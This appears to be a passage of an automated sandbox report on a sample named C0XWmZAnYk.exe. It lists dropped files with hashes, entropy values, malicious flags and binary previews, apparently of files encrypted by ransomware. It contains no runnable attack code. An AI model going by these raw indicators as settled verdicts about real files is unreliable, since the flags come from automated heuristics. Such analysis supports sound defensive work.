              Preview:.PNG....-(.+...cY|...r.=P..........-g..ogN..~..$.Dx..F..%b...W.H,..DJ-.p.v(...L.v.YF..W..{/.Y.m.D..Fgg...V..Tg0.....r7......Y.o...E..@Q.....2.t?d.)5.........jw.PD....._r)e>;!...[..KR........Z..i.8t..l..G.1.x..4.m....BY.,.....'.b-;.Xe......i.....qJKR....$..BQ:.GpG.2.gL/..$:;i57.....S......c^Y.g.....r......0.f-T.k...w.....*-.2]l....<.......?W..b-c.._~.~.cc'."g%.......Y..$F....>..iZ)w.k.,..B%.o.......C.Z.xlH....7.cV..uv.........(.s.2...x.F^..W).+..6.~.=......r..JY._..=........0....`B.!..ob[sb7....h..`...s.......... .&.'......).F..._..qUG...v.aw...j..4sq.....1......j.%..q..(K+:.].0F..(t5a..b.D{|$....|7.......ZV........6b...0..v....?..B..b.u...n..].6Sg.(8.e.../x..V... ..D...y.......K.=i4:..Z. 3.....)..@U>......P...f..$pW...hS{ea.X_Q.z?..D....O..D.N..)..Y,Z.z..QF.....kB....R#...0......=*..>...w...p.#U..!...`_].t......Mht.U..1.+/.d-}.V...q@\Hs...j..x.8...t..8.V&...Z.7S...\.7s...n....6..b.0.;b..B]...n[+J}.....|F...V..d.d...H.L-...H........
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):4903
              Entropy (8bit):7.950294721218891
              Encrypted:false
              SSDEEP:96:Aee5erK7z1kqtGoyPgpF2JYLzWlVaRrU//TNDDglKIfa0C:Ahgsm/Pg32JYLz0aNoRDglKIfa9
              MD5:BCCBCCF07AD7359BEDB3B6592E43C1F5
              SHA1:B8D56722F4F0EC66F19C3051F869B306B20D6764
              SHA-256:E3DA3E5DF3675D240BD5C37D1C3A2293799752E5FF909783879A3DC0D3F8768A
              SHA-512:23A299F82DC2DD007C7DF5F454614D575A599ED93EB2BCE80180C17FFF530DE256A59387C8C26AF77CDBB9915257E52CD778940E7382FF386538DFBD668AFFCA
              Malicious:false
              Preview:.PNG....w..R.ti.D.a/ |c..COA..7.,i.xp:.r...:D_|S..qCo..:..7.GO.H......?...z..\>.T..@p..3S..N..@...!.._F....7.4.._.K....&~......d..n...]S..&l...... S.jQ.KE.F.j.1vE..3...8...X...Du......f.bm..9.;a...a.r.C.np}D8..u..\...ZE]..|.e...&.3V>v_6AKrd...W.@.]=.]sDn.~..`.3M8...g1..J.....g...........].K......).D.1rG......X...w.P?..V....4I..2.v^.v.9....T~..G.Z....n..?.....Bm...a...].U.M{.k....J~.N`..%...nq..R.I.T.D@...."......-..!M...n.8.....3..ev.Mc%_......P.T......D9.....R....Ie...v...."....nQ.wh)l...@.&`......_.....1-.....4.0`...q.2.L.%.HbdH.......=Q%..(.3u3d.EWBhf........V(@."......u.t.F...8...%......?..x.........V.`...a....k..&.. $..._.%......W........k.m...%.Y.m...%;..=.SA.k.`.f..).1.@&....*..v....$..`...T.'....y.iHJp...m........e8c8..k.At..$....A.UZv.lD..m....k....0..l.L<.....fiN..F2.....M._*.=......|..l.^.E .j....E..6.z..).w..Y..2.........Z.....YeaT..E6.Q.A.....S..S...;:.I.u.G....`.+..Pll4$.2%.$.g.d,.y...%p.m..$a....W..L-o[.:.5...t..c.L.+.g,W
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1247
              Entropy (8bit):7.851972121637516
              Encrypted:false
              SSDEEP:24:mcxWd/iOmw+LC8lIxZKh4FxDdGDuT3BbLoRFBURK6Ad+bD:mcxI/N+LCUIxPLdlThLoRURz28D
              MD5:0D55BF1E47007DC378A61D90CD5FAAAA
              SHA1:E58A115F043E76A01ABA1981F838C6CA9FDD9DA9
              SHA-256:F941685F60304E55B9873EF660BA07055ACE784BB99090E48A6F102243E7FD52
              SHA-512:2879901665AD7948F08EA3D4908B55D41FC541930FA5B1E35DCD4132C4D75D5419990B0B7C126DB99D36080D01A7A31EA8449DBA0A55FD9DE73B7D6C61AB1BE0
              Malicious:false
              Preview:.PNG..q......,uP`f...].U....B+.Y..S.,&...#.'......H...F..'..3.k....~R..p..W.;.X..mn........y...&..$.vCl...*Q3.....SfK.....:.mG..z_+...$.4:;]}..x.....j.......ddS.3h.1\....c.g.&..bF....L|..N...W../L.-+....j.=.......?.us..U.?n.st.......PT.:.....<....[.!Y.....:.M.e....L`...==..6..d.q.G.F.nL;..i.!.hM...`.#5"......`.pu..d(~.....5....DFO....w. .[.$..../.n.s.P<..U.n....HX.....Gq?..lX.1MA..o.{uf..|q....A.....N..c.J..O..q..H.3..q.|..Ef.iZ?.t..v.a.c^.z)..2..c.+......h3...:<.a..L.x.....N..}..?.."....X..W...qQ_.....R......!9S..c[...H...6y. ....?R.Z....T)h.o.`7....F.YW.N.q.O.|...T...'_S..P.nE......J.-?Ae.}>...3.uk.M#....k.uO.f........I.= 7.@R.*.H......=.... ..+<.w....FIR(.%.-XK..Xt.@V.[n6..>H...Tn..<.....s.pd.2S.4@..^&....n...%y....aKj....L[w.M.8Ho.C..]..uo..d.BiR.....q.ZAi.w.B.2.@|<....Fv...<.R7.q.JQu.....J...~....$..H.....q.....*J!j....\W.........>..eW...SM.F.4.4F....~..#|3.....B......%..S..U.b.W.. ...)......}.(9...p..x...*8:..X.4BB...XUa...hZ.f~2i.}.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1422
              Entropy (8bit):7.847338299321904
              Encrypted:false
              SSDEEP:24:tMEnB11WEdPDz9r9QC3rYf9zyxpej6HK0fOCq0nkF4qA8/f9cVJYPGcRQSd+bD:/fp9xr+zyx3q0fOpRLFcVuTR8D
              MD5:F541FDD5B2BEF9F95FBE38EA54D1AE1A
              SHA1:16F8FDE2A2F101D863E63858A847916E04BB08C8
              SHA-256:476D605C147289FD0402A5B7DDC6F8FF1930BA4358EFD76891108381F8C769FA
              SHA-512:5C08AD293F38F1BC579E5E5B11303D3982E6AD38ED30E649C9D2FC66BAF7702DD26D85A1335DD00016641E1CA51671274269800BF8A38ADFBE990F87925ACE4E
              Malicious:false
              Preview:.PNG....zm9.T.......`(GI..2.(Q......X.Z...T'.K.....OM.........`.....S..4W....`..A*..C....#.%...{YRK&t...[.Qt..M...c.H..Q.!..u.c.6....X.Y.;.....;.{..R.F.{k8...R.../5L.z.>...$....-.a....u....cm`..F.!E....I....I.P..?....C...D...,.h8....V......f...em.L..E..r.....M)...%YR.m8+....D6.......6Y...feq.}U(;..dP.:..&8m..PG{..]'g.....l~.Qv..'>7...mhQ.........Q.n....h..y..-..lL7.l...j,.BH.g.*V.+Z(.....(4...|].....{..k..|...(c>.b1..R...]R9m..D.".4q...>.,m...S+...b... ..{.,....,O....rs..g.^.5.=.:W4..)....Z.F.:Wx..%..H..i~9+...t?@.R.'e@.G..D.`..\.^.qHG.Pn...x'\oY!/w.:.:...I.\..W)F_."....PH.........E.3..nR..*....j....M....fg..68...n..:~..so..(.......nc".(.M.f. ..D:.gj-<..<.?......Q>'N<.S.7.[..Ke.L.-.e.|.@..1$._.r...1...u.)".)J......w^..#..m.o\Gx.<Pl|BnLo..*Li....6X...^...>..."^.5... ..pg>`........}...h{.Ce..eY..g H...p..9..4V.vW_Y_.WPd.B...0x.k Y".D.U<....?rg.Yw9.....O.+..!toB.8..}Ni...\....TP...Y...o.F.8.{nVB...y....2.}..;p....l.L...|> ..x.6..&.J...&Jg.;...=mj.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1566
              Entropy (8bit):7.876341947942223
              Encrypted:false
              SSDEEP:48:WVLoYlXep5r/jdtzHXeBLuf/LLal59lO8D:WhzEpN7jkufD2l5r
              MD5:B531173DE1890579CECC50349A74EA77
              SHA1:9C65ACAE399C238C5E136D1A1050B6550DC5FB2F
              SHA-256:3DF3F2C2DE708E84BAA381B04A9EC52EA938F30CC7B70E4B6EF5CFBE2261EC21
              SHA-512:D30787B5BEF8C073593770370F1AE2DEEF3022F158BC41EA92957145B36DA715256F7B27B51274E0E2377A807965FC91D264757497CD6B907F91D6DFBCEB5B3B
              Malicious:false
              Preview:.PNG.-..]..~J..Ax6*r.,.d...\.#..;.....d3....V...^..Q..m.|.`0.x...B`..!...A5F...l.~.zCR....3......wm........N...YYP.x..U..AVN$M.KNe..!W....-tf0.f.@_W...g."es....5....?+../....r ....V..X...e..Z...6c!...0%...^..1.g...-.U%l3r.J.<x.mP...za..$..R......b....YX>....^X..W.Z|.#a5. ..+..'.".....*......%4.....0._P..J...../i........N.C7.1.v.s...K<.d~..N.@a#*._...._>..=X'..v.b.1..T".<ia../K....#HM....N...{+........S..+...8..h.~..j6...`.f`.F>.9...M`)...3.z!...Y...M.?..;.K..E+.F.e].. ...j....5...]'.....?.e..<[.Q}...<.....z.LsR<.*z..}-t.@..l.Uhs.)....{......G...v.c.T....lv..k5.B"../.A..$.t\...v0t......E;5..._W..+.....K....(..t..jTb..jk.y...b=In.....Q..'...m.....L<.7...s.z........Cg" ..H.d1O..K..q.*.Y.dhb.F..{...t.........a.B.#.F....b.....p.z...6.{......]./(-M...,$s..X....U...B....W....sr(.B..O..=b..#...4l.`'A..=m.|{..m.Zv.f.m.IS..#..W..(..R.D..J..u..+[.}.uW.>.j......Z......3EB3$M.@r..V!.-.JT*5.t.<..Wg.{...U..>m.!.6.TXF..bFa.../.)U9..$Z.Ms......F....z;
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1802
              Entropy (8bit):7.868119302642353
              Encrypted:false
              SSDEEP:48:QQksqW4W0dcvYCkhLhNtTJ68oz5FRAXpCO8D:upEKhBm
              MD5:3CDF95FB1ED8CE8FA3BCE28A114BE682
              SHA1:E896A8916C0C75241F61D1CF5FA0BBF467D49B91
              SHA-256:61AEE98DB84C63DF5360280ED975CEF5E4CA9BD07BF97913A55290B2713BECA3
              SHA-512:276AE3F7D43A49A31B41264439BC54B15B682C74E1DD2B50AEB26F7B4E72E4D319E6259681466064106AC8B617B7414BA5D928210D59AE1AEC4676B876340BED
              Malicious:false
              Preview:.PNG..-..C(.6...2m.S[.oJ...p....3pa..K...ak/.A;.......kv.)j[Y......h.....apG...-.XQ...vY..'.X.8..Z'...<g..2.v...;..a.<.N.vE....=..'..b..:>'..6F9.D..=..rs......{.p/.... ..M>T.}......Ka..._CY.b...b'...D.e<3.)N.#........*N./S.m......@..%@.J}/..U}.5O.6..;P5r..'n."B..I.......I....\q...>.t..6H._,..zf.%4.....ifS.g.8..'(.....m$.....E.s.-...@..m...J..P.......w.ZG!....B..n*$..'...J.Z'3.....9.\.b..H..@.Cw.-.....wr]-._..y.3L..K..W..oGP.__`?..q.<i..a..G..09{_V-:..V.>.F.`rT.x.&*....d......+(..+..<.@.}lf....n.[..}...C`r..QlM.5.f.VQ..b.x..~L+:.-.......O.*..Z).GR..{...v...,^^....S4..92.....e.g.e...b.....+..C.6.,GF.............kWOjQ.!..F......s`..........&.3.@3.uMP....F..S...3......}.X-..CS*.......~".`.M...eBD{6.h.\b...r.c.o9 .m.. .j.........F.u..Y.......6......'...yq.P+......'..x.k..gV..5..9+_7.....oVy...1.6Y.`B6.@......yE.z. D3.<.9aS.h.u.sz....x.D.Ud.$...c...`.M..Q.Dv..].lQ....g%......,.KP.HY......p[..`.?~t'.a.`.<.6.\.'..V......:.6L,..e......6.u..s...
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):29006
              Entropy (8bit):7.993627648000758
              Encrypted:true
              SSDEEP:768:pXWqGRJMQnKnTnBW5ePw6qgc41yJ+9HNv7YC5PYD615R1SO6xHQb:pXIJM6KnTAcPw6qg/1JNvBBaMR1SBxHS
              MD5:7192A3A601C6072D854AC7BA15C3D72B
              SHA1:0C7EB4A17089D7A013DCE8F89BBC82846BF28EDF
              SHA-256:8BF36C48A5F6F9EAFDAF32728EC92A04B801C6B53EA05F46FA5A13FABB6B142E
              SHA-512:8104E185B8CAD404C2C4D3B9F1C571F97BA0CE7F5D75DF1DFB14AFBF5B1DF8705853DC05A6AD73E3587D020DA687213D96F77B7109237EC72B98EE36E2DCB7A9
              Malicious:true
              Preview:SQLit....02;..Q.|.9..}.6.\(qQ8...u.u..Vn..A.U.u.0V.V..v.pyuh..k..=.{27...a.Y..p....z...{..>$.......{...:d.zy`.....n~.V....|!... .v.e.......Q....+..q. .W.<."..&.X.....d/....uOS.|...-..}..kc.*+!.?/.~....2.X. .4..1\T..%r..........'.d...~.?..y]?.?.f..:..G...2XOJU.=..5s.........0._ bb.......w...&..).....Bc.lrC|.A..F.H....2.F9.|..EM.,^-a.=F....L..._.sO.).H[..M...|...yz.....l.\.J.. ....6c.(.........).Q2?.].a.TQ.:p...8-Ky....@.,G=.+._6..S..R4.....%....|.,R..3...+b.2jx.K...<.D....A.......P....=...Jl/.%v./.yb....P...'.?(Y....\~....J..Tp...4..A....`....c.`@M.&'.O...+4...........u.-...k..B;..HX!Nx...\F...^]..V..:..E.u~0.a....+..H.dj.....h.#.cf......&."D....[...9W.......4V.......#I..BK..::..f.3v...g...[G...p>...S..Ri\....F...X<...Y=.g._.vj2ef.....!.g{...).O...F..OM..-..1T...6G?.. ....vE...'<..\a.U,4.D..\..%...n.z..W..7.{m..`.....?.....,......K.p.6..z..el5.nf.xK"..."Y..C.M[o%.Z..e......xW&..1%...4...x-.*.f(.....#..*O.v.|..P.W:o.W..c..Ov.. .K]o..ot
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):58432
              Entropy (8bit):7.996954831721248
              Encrypted:true
              SSDEEP:768:NoF4BxwJ8fIXjgaPp0VIDA9l2rkR8b56rK6Zf+sXhHedebihwQormiFwlD1OZ9o4:uEx9aRPi8C8b5V6ZfBVFiGwiFqZOZm4
              MD5:67BCB950048DDEFB1D1EBA0165F692E5
              SHA1:639BC74C53F67811CA329DAE352AE56EBD2FCC0D
              SHA-256:318067AF30D67205BE11CB256BF378AE9C571E59CF92B84CCE4DEDE786D3A305
              SHA-512:C25C3BDE0E2552BF006C380B33DD565676B927283D636C3BF3D69C494E6CC1917DCD04C808A9559BF01831E679E4FF40D7F9149509FCFE9496A7EF5F408A1A16
              Malicious:true
              Preview:A..r..K..*.o....1...2.......:...ti..qa'....M.....A4......PJ.b..]....@...#It65..x...A....cG8.FM..=.M.O.....C..9.mz....S....c.R...?....=..MF'.."......q...w|...g8.P......L...<.......Jf......k.Z.g...8.....,..+@&.$...o.K..P3.f.p).o..@.....(...Y.2!....b.~..}.ulEL7.qVF..x.......!...b._N.. /.H ...;...|,.Qn...K.....e.....M.f...5..j....t.1......^..Y .}Yp2.ZU..q.M...!z..GV..O.X.e0m.1L..b9..K..5a.Ui..:..%.5/i....y.i.n...3)%V...n.....LQ|.5.1[<....m..z.jR`gU.K..@.F..{>."."h-avh.,(ohz.N.WB...0..%.^........x$.*...|.T.$.......d..O..&.4T..m<.W.Si.OA.$..o.6..X.s....q'..# f.WI{.T.........f......^%*.n@...R..j.&E.m...K..j<K.o..._[>].Y.E..'.......&.#.. ........|y..;.c...3,7..g8.r.s.K...fw..y.$.I$);.g.^.W....S.O'...*......q..b......d...@GBJ..-.Al.#G.{.<..-........w/....v...".o.o....>.kf.ye...^..=....f....NP..../.n.o}.P. 1N..g...A*...o\..j.....+X...`.=....i..(.Ut|.......$M.8.""..........h....).Z5&Y}.............."Ys....%<_.N......f.@..qGoO.W..S+uU..q
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):49486
              Entropy (8bit):7.996136625089054
              Encrypted:true
              SSDEEP:768:yR8w39Wl+90c5UVqim8UOvgNeG7VHa4+Emqzjp78jV9BZe/69n0uuiw48:yj9AC2Ye6F7Vhzjp4Te/Unxuiwj
              MD5:DF1A855524B60C45AA1690D18C3B5445
              SHA1:B28415AD33F15D600A33A043D9274A08839E9398
              SHA-256:7D796BE196F6B3919ED0AA4B47D874CB588C08C383764BB47335431A0E591123
              SHA-512:38F1C7BE7E46B73940A6CB974FE74BD6A7238792CA40AA461A1CACB434E8CD4D213B47FD559B19D45A2AD97248E3561E390B5893D7E49C467F2D368F28302EE3
              Malicious:true
              Preview:SQLit...M...D..@..>...f.!_...(Zr..3.A.H.2.8i..*/.1.6......bn.@Rw!....A..m5...z..F.2G.h..@.`.k.1../n-...q/....##..o...{J.d.sD..).......p.....C...hz......=(S...Ca.E..,[...6%>....l..OK....$.uX:.i..H........m..B...<?..h;....t.E.e....s9.........v.[.....xv.D'n.a.S....5..$...a..H.w$Uf. .?xM......DQ.h.......m....A...0..B......CS.I...n.+}..>L.D.w6......a....ji.'..../..._..A......"M...t(c(.?.Mqm..8..'.7pR.d.S.4u..Y....>A_.n.n........j..P5k.@..EE|.t.i...h%....\.....I.w.X...0p..0.7.'`I..dg..6.]..YQ.....}.:F?2_^_..".h0..#3M..@..G!G.q.K..g..]GXP..}.....*....e`.7y...C..........(.".....V....w.......o9.A.9\....R.|Fd....U........H..J/........Jy.V.qu..b..op.R...>#?...jB.......L._...."$/"........o......Q............P.S6z1a.=&.F..v.s"U.w..AS9..o....u......L....I;(..?..v2*.....`]sPq.Fd`.H.s.JFH\..s.C.....|.o"_............k.s./bS..v....U^..r......@.93...{_`S...6..?|.-g..XN<s.AX6...'.z..x.uqM..;....b....`.'8S .Q.h.8/....P....{]u...).._..;\F..AQ.3."[....{...r&l.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):354
              Entropy (8bit):7.28088123997377
              Encrypted:false
              SSDEEP:6:Q5RlYYv194XNSm4STKsDErRJdYEUxns9QTfgeSIUpbRCI9fMfgmSdxa3cii96Z:QNIAmRTIJdzjASb99fwgLdxa3cii9a
              MD5:85A6C2E8F4BC78B3A46E6787B8017D75
              SHA1:9C3CFB0D77245ADD0F0690239FFD1CDAA4C9D0D1
              SHA-256:84C1C1BE8E184A5F6E89AEA62E2EC8E9E721E856BCC28110B8731E3682ABBEB5
              SHA-512:CA5903256593AFA77928C3DE77394BD522F1FC442743B51B9462FF525EB92A27A169138A66A1AA48EF97CF55D6DBC7AF0D0576C3D43FC1974E5380FB345B11A2
              Malicious:false
              Preview:1,"fu.G....1.L.2.K.cT9.....F.ZDo..~.-I...`]X....[#.yh*..64.9....`..._$)....O...I.yV.7W...K..QA~.I m...W..;.R.!7 .W/w..E>.I.K.....W.i.....e..B......@......>...[..T'qr.?.<.!..@.X=....T@.|~b.X...E9.p..IH..N....7...v....SL.Jo"...9.>K...>...Zn...gp..*...L6....[<.P..gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1554
              Entropy (8bit):7.870540443019551
              Encrypted:false
              SSDEEP:48:wQF4MKpiO6u0FKu8uYW3aPBuQJkPccGi8D:V4tsOL00B0aMQJkTg
              MD5:A1281BC16BE2DBC1249B6DE9BDE2C205
              SHA1:33904B06BCB2AA1642F9EE86AE59915F234164B4
              SHA-256:75C25A7A75242FBEF5B4473D5F77A46B45AA78024B09208651CA7B5F406D0E06
              SHA-512:4F71AE9CB12843AC9693EE25228239E02C5C040FAE8BE6DD5CE6AC4076BED1F19DFFF36E0353B8E28860AFCF842F2D6070CF7DD85D57457D38843C617F748B10
              Malicious:false
              Preview:1,"fu5.&.o.{...8h..Y.z.;....n...(z.'....).&q.n...3"1.9...#B.....]-x.-F.XPb....{=o7.....5..<2l..:.3...)4...V....$..:.n.t...9U.\.X. ...L:.q.(X.d".My....9.,....@..5ZbA..L.....;..v..?$l...a(..]c57.[...W.G.W.O... ...&...%......%6.n...k....y |.O.$..6Y$.^Np$.n......E....K.T.1/....Xz,.S...W}....1I.d.%SVu.3dgq....J..,.5}..4.PN..l.K.`3.f..b....5....=x..3c...........=......+i.).\O......6....'b.q_j.......r.h..$....q5g.z*.].0..f......e.....v7..9...n..v...tD...s.R..cHx.w.......Cn.._o..[.<..1D\......Z..~.|.-W..(O:.v.n._'.u...MPp.GQ!.. .t...%.......U.'.&f........L*.*J.....N..<h....X.F..!<..w..=?.!.>.P.T}2.p..,.<...-....a.V.........F....7....s!......|l.}#.b>.&F.:.....$=I......?e.l.I.[.8.0...:xp....a#.o]..F...6...*..\.g.7...N........;......^.$.$B.P/"..*..c.N.?.s.V.4.UF&.A..Ov...N~.V.&...l..!..l...k.3._..Z&S.V_../..+..F..)<)...0...p*...<J.:ZN.?0.S.sQ.......H...eB1.k.]..3.i..&..A..I.|..m......B4.."..Y.dj.ZYL..F.6.q...z2.b33.:...T0z....# p.w#..)K..]7a./.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):976
              Entropy (8bit):7.78445719003512
              Encrypted:false
              SSDEEP:24:D4kESfC6m/HXx0Y+6iO/M5f79yKpXenRAyFd+bD:MOfhm/Hchz9ysy/8D
              MD5:8504F89E7DB5C53E4C9228CC2F060481
              SHA1:3D5D2DCABB732E32498EC6F36EAD37DAA10DE181
              SHA-256:E03323C24FB456EAA594FB7145DC6D18D45CE191FCC17BC298486FD1231E4093
              SHA-512:4933CE0A48720236F6EEE92079D1EEC9F6C76EB1A45D69F64AFF2022AFF6A29D7E62E2D4B86E6FE29DCADDAB270D0AE5B8DE8F10D074AC95767F7E58DBA0FBCA
              Malicious:false
              Preview:1,"fu...:D/......Mt`.{..i..ki.6?5..4'.\#].3...X...u9...:l......i...`C.X.&..."....;.u.7;...;?.c...%4...l.!Y.^.....iW..r..A...>.z.~..O<wp7Z.../..............Q...........K....u+B.o......J..xW..c.F.......q?.~.~..........U..q'w....R.g?D#....9..K.....$...z.9...e.g..z.5.;....Y...B.7.s...3.<..&...>.Hl.`=.9.sm....5p>H..v.&k..:C...l...`...f.......,DB....}Wr`...W...,....Ba&..$.(K...o...,......A...&A$m.e.C......!l|A.....}.t.k..a..SM!A0.}5.P$s..g.q=.,.-..{3...Ci...)..%.".K.X.I..... .\.L....8.=.mn!.*t.....\/N.*Qp4.].....F..Q..~%Z..Hq+."U..1^a.n........G~...]>b..F..0........s.....A.,....2;...4...>>.......y.Ws.J.Y.Z...u)...W.c.....p?..9dG...4.\v..T.r<..E....|...N;d.?i.*.yf.H...v.5..i.1:..[.dL.....!...%..)~..+.*.].L.#%.S[."........G.{.w$....'].....;.. rQt.Y4..........Y..$v..'....p][.Y..*.H{.uX..w'.}(a..%..+p>.....r.$W.4..T.r..?.......".y.J.!.J[.UH>.....gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):976
              Entropy (8bit):7.7940012272333865
              Encrypted:false
              SSDEEP:24:IgO0dBhxt4da/uneKmoiTmInThUEYnqd+bD:TOEhxHdKmoiTNTm3M8D
              MD5:8CBC8AA5E58BCB9FCB8EEAF2C378A1EF
              SHA1:39164C0551651511BF54577BBF1E6ADC8DABBD5B
              SHA-256:261157A81956D9B6A9BFD79B38D65C505E356289F829FE754808F79EBAC14576
              SHA-512:5D4F7162FC749D7A784224993F29F319DF7F1673E0481261441738C8DC8A0D8F442AFBF35E3BC3AF8372D6720CD0071472C9D3CD2A39EDE5041B708637E80887
              Malicious:false
              Preview:1,"fun.xf.i$.%H.tJ.|.`7./.q..N#...:l.....Q@w["9'....\...>.v.......g`d.S:A<..]...<..0.#..!..S...^eVK....Cs.M....d....)Z.D.5....I.....o.^....[.K.#...:.{..t.gZ... ....<...^.{....2.."..B......$..2r.2..;.y.P...@+Z..E.&..1h.j..p.$....?.e...B......O.w.w:..]CX/*a...8:. .U..'..}[..df3.)C....F.}g...(....g...ou.j\..`..(.PA.S.|..2;.0......S...eiF.e....Gn.{._......j\k.G.(.s.pl:6...}>.1fG...gy3.NRt....kW9a..}.....@....6.1...i.p.Z8..6...A..#.a..-..1...+1..i......Y&.|..)b......(....V.+.=.t.)......\. ...F..C...S...MD;..\..i...WD:.iR.%w.....T.........- [qvL...~i,.r....."h.X0DSA....|..S....G.e.*..........D.......E#....*...D~Z8.......O.....f(..0.@. .....V<.7h..3}ff..W.S<B..W....io.LNt.q.\..!..6...Q.A....s2...!..+r.H>).'W.."..0..&;....s.L.K.....'.FuD...]w$8..2.@X3.7.a&Ou....%5V.8.....W...n....A.P..............#;0.O#.....m...4p.`}3#..-..o..H................z...~....R.gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):400
              Entropy (8bit):7.40851428519145
              Encrypted:false
              SSDEEP:12:HmFLA2GCB5em13B14raYqrspWrEi/OA4RGdxa3cii9a:Hv0remhHmOEi/OAjd+bD
              MD5:55BA5CECABAA0FA04178734B5F770C6B
              SHA1:BA593F14DAB0A305BE72585431B0AE28B3E5D014
              SHA-256:48D132E50DAD6FCD23E52BF52A6F92F916D405652C553DAE954E51A5903ACE11
              SHA-512:B2A613CC26B816DC642EAD5168A276F107A8784A8B085C1A9B9DABE2CDB460D3FE11A8FF4DEE2FECCC94675EDA9D71E429E65910DD15F0C5C1E4D5603898E1E8
              Malicious:false
              Preview:1.8BF...^.6AT.O.LX...\}..........d.[..........mc.....;@..c...B..P...M{S\..-.k..^=a..-.|.w..l.^v....*..l^{..k..l......U.[..,..(.....(.Z...Y}4H...._.<....|3..B...Q?@u...j..}x:h.^m.).\.@h.`...H.d...u).......J...........9..Y.s.hw......y...._...F..by.x..|.Ww......62h."...k..'%I..$!...5...^.....KgR.z..`.v....^.gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):468
              Entropy (8bit):7.459608558598857
              Encrypted:false
              SSDEEP:12:yeWfeN6Hiuvr+rb9VJKEW0YTjv/1kLn86dxa3cii9a:yegKiiMKPNKEudkn/d+bD
              MD5:789123209F6EABC0FCF64421D9DE5463
              SHA1:52FA1F35771927F9640086E82E967B2BC61ACFE8
              SHA-256:2BCAC46EAD4ED34A961B77E833A528E3E0DB927732A5B398CAE24F0BE3630D5E
              SHA-512:2F231361F44BD38744835EDC40DF645BF5DB92EE430391FBCB4026651428B1DE88F23639F5749686773F93080CF5B44560E605839E15EA906DD6B9CA94D22FF4
              Malicious:false
              Preview:{.. .H..m.\.{...k.E....Fm.4..?.Zf.......YB.5*...V./%a.r......cI.A.T....l..<.?b6-f'.d.[..|$.../.>xN......D...7ZM....U.J.D#.w.?..88...y`.J..S."mJ.0.4/.G..jH.a7b.....ra7w......,.|P.....u.R9..!H....5.Y...9.{..{..(....."q....7Y|U..T....++..m."...^....8...z.}...2p.<....si.<.E9..i....ok..KF?....D..4....rvE.......~..|...5....!^+...2.&.4.A.3P.S.12.%.X.U.....5.<.#....W.V."../...-.ygigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):3498
              Entropy (8bit):7.9516819715365825
              Encrypted:false
              SSDEEP:96:xVf9IMH1gZ0KowryqCMRGdOehQxI8H5RJ9:xYbugryImhhQxISj
              MD5:12204574C24F6B51B1569121DAF4B02A
              SHA1:CB1CFEFA2D1A94BF67E2C64233123E5141E0F239
              SHA-256:374470A4430724343F15073B6D9662BF4B129114CD82973C41BBAB2E4DD1BD45
              SHA-512:C74E278A78C7108A9FF0D324CEEEAA5E90CA6BA1A47B7E6ABC94759B4645341E48DCBB162686F7036546D2B367B0FC3C148BE9F989566AD25A157836F0873AD8
              Malicious:false
              Preview:{.. .|.Q.x>.u[.s....U..L.........p....Q)......Z......6}P<..K.y.....+{L}.....CP....#...q.Z.6.`.O...I.6.i.3.4*..:.z<eh^..,.!..@...T....>.\..93.s....P\~...}......[..:.^......kFk:g.m......W..."....oIW......8)V.d....@6..RV!u.K.M.U..e.*;)K.$.t6...pK0y.(kk.....3..xO:.u.Q....<...E]....:.../[^G.f...c.0o4.[.2I3...\.C.D..Y.(.J!.|.GX...2=.u...ry.Ho..l...0..{R.g}..b..?y>..j......$-m......`.M....%..?:..1x.}<ag..~..di...`.q...u.....g..a<S..93..J.a..:....^IW.2.dU....n..yNz...F.#; ..U.#..8..5EI./.;.2_h.7q..L.R..*...5......q.G.....F....K...%"3..j....}..,.i....9V......|.<..`.%......Y.}.j&b......*.N.........*j/._H../.G........X..jF...B...4....V.l......>5s.f.XTb.\...-.+..P.p.D0?.n-...0......WR\..]|.4j..f.".>R.<v..n..j.....?a..(..f..1.:.Zz...;.... B..""n-...3..C#C)).....-.....%.4.......CC*X1.Y..8..`.&#-....a.|5y.."..h.y.f...e.B.T6W...(.]....[.......IA.....e.?...aO.....v.sD.V.._W-H.... .~F.Z.E.."*r.PLJ=.L.|ns].7(>.7o..!F.js$.U[..#...N=.s.n].[../zr.F.R~
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):218058
              Entropy (8bit):7.080821779776715
              Encrypted:false
